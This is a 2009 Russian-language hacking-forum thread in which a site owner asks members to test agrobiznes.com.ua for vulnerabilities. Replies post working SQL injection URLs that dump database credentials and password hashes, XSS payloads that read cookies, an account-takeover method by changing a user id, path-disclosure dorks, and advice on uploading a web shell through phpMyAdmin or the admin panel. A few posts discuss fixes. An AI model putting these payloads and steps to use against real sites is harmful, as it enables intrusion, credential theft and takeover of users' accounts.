Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Проверьте сайт на уязвимость |
23.06.2009, 16:05
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
Проверьте сайт на уязвимость
_http://agrobiznes.com.ua
Сегодня заметил что в конец файла index.php был дописан невидимый слой с ссылками. А я то думаю почему меня яндекс не индексирует..
П.С. Пароли храню не в фтп-клиенте
|
|
|
24.06.2009, 04:06
|
|
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928
Репутация:
20
|
|
1. при регистрации картинка с кодом подтверждения имеет вид
Код HTML:
<img src="http://agrobiznes.com.ua/classes/img.php?r=2957"/>
где явно видна цифра, которая будет отображена на картинке. в таком случае смысла использовать код подтверждения нет, любой отпарсит.
2. _http://agrobiznes.com.ua/phpmyadmin/ может как-то переименовать или переместить в другое место???
3. при редактирование личных данных на страницах редактирования пароля, редактирования личных данных, редактирования фотографии, форма в хидден поле передает айди юзера. можно изменять из-под своего аккаунта данные любого пользователя. |
|
|
|
24.06.2009, 10:48
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
http://agrobiznes.com.ua/classes/sm_katalog.php
Код:
Fatal error: Call to a member function register_function() on a non-object in /home/[...]/classes/sm_katalog.php on line 81
kreativ_uaagro@localhost:kreativ_agro:5.0.37-standard
Код:
http://board.agrobiznes.com.ua/ru/obl-20518.html?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),database(),version()),17,18,19/*
Тут же можно достать логины и хеши. Первый же хеш очень легко расшифровывается.
Код:
http://board.agrobiznes.com.ua/ru/obl-20518.html?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(concat_ws(0x3a,login,pass)),17,18,19+from+users/*
Далее:
Код:
http://board.agrobiznes.com.ua/ru/pages/80/?kategory=&rub='+and+1=0/*&subrub=&country_name=®ion_name=&city_name1=&city_name2=&flag=bygor&search=&do=filter
Код:
http://board.agrobiznes.com.ua/ru/?do=filter&lng=ru&flag=bygor&kategory=0&rub=0&subrub=0&country_name=0&qwqwkod=&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&do2=
зы: искать дальше не очень охото, тк сайт подтормаживает 
__________________
включи голову
Последний раз редактировалось oRb; 24.06.2009 в 10:55..
|
|
|
|
24.06.2009, 19:43
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
Скажите а можно через эти уязвимости залить шел или подредактировать скажем индексный файл?
И если да то как?
|
|
|
|
24.06.2009, 19:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Через SQL-иньекцию найти пароли от phpmyadmin, которые ты не спрятал, и от туда залить шелл.
Найти пассы через SQL-иньекцию от админики и через админку залить шелл.
|
|
|
|
24.06.2009, 21:28
|
|
Участник форума
Регистрация: 02.06.2009
Сообщений: 143
Провел на форуме:
343507
Репутация:
114
|
|
1) Активная XSS на странице подачи объявления.
Слабая фильтрация в заголовке объявления и в тексте объявления.
_http://board.agrobiznes.com.ua/ru/obl-20535.html
2) Еще одна XSS
_http://board.agrobiznes.com.ua/ru/?do=add_ok&obl_id=<script>alert('XSS')</script>
3) С помощью перехвата пакетов можно легко сменить пароль пользователя. Достаточно знать его id.
Алгоритм:
Зайти под своим аккаунтом.
Перехватить пакет при смене своего пароля и изменить id, который открыто передается за компанию с логином и паролем.
Проверял - работает.
Последний раз редактировалось W@r.N0i$e; 24.06.2009 в 22:30..
|
|
|
|
25.06.2009, 01:48
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
Ну общая картина мне ясна:
от sql_injection - пройтись по входящим переменным и хорошо их отфильтровать, поприсваивать типы, длинну данных и т.д.
XSS - коретно вставлять\выбирать данные из таблиц. Экранировать данные + htmlspecialchars
Как быть с пекредающимся id при сохранении данных юзера? Как можно исправить этот баг?
Может хранить id в переменной $_SESSION ?
|
|
|
|
25.06.2009, 01:51
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
* Раскрытие путей
http://agrobiznes.com.ua/classes/sm_katalog.php
Код:
Как Вы узнали этот путь?
|
|
|
|
25.06.2009, 02:06
|
|
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928
Репутация:
20
|
|
Сообщение от Nicca
Как быть с пекредающимся id при сохранении данных юзера? Как можно исправить этот баг?
Может хранить id в переменной $_SESSION ?
как вариант  тут в соседней теме мыло и пароль в куки засовывают, т.ч. смотри сам. 
|
|
|
|
25.06.2009, 13:18
|
|
Участник форума
Регистрация: 02.06.2009
Сообщений: 143
Провел на форуме:
343507
Репутация:
114
|
|
Раскрытие путей:
_http://agrobiznes.com.ua/board/classes/sm_board.php
Код:
Fatal error: Call to a member function register_function() on a non-object in /home/[...]/classes/sm_board.php on line 131
Сообщение от Nicca
Как Вы узнали этот путь?
Например: Вбиваем в Google:
Код:
site:agrobiznes.com.ua Warning
или
Код:
site:agrobiznes.com.ua on line
И смотрим выдачу.
Последний раз редактировалось W@r.N0i$e; 25.06.2009 в 13:27..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
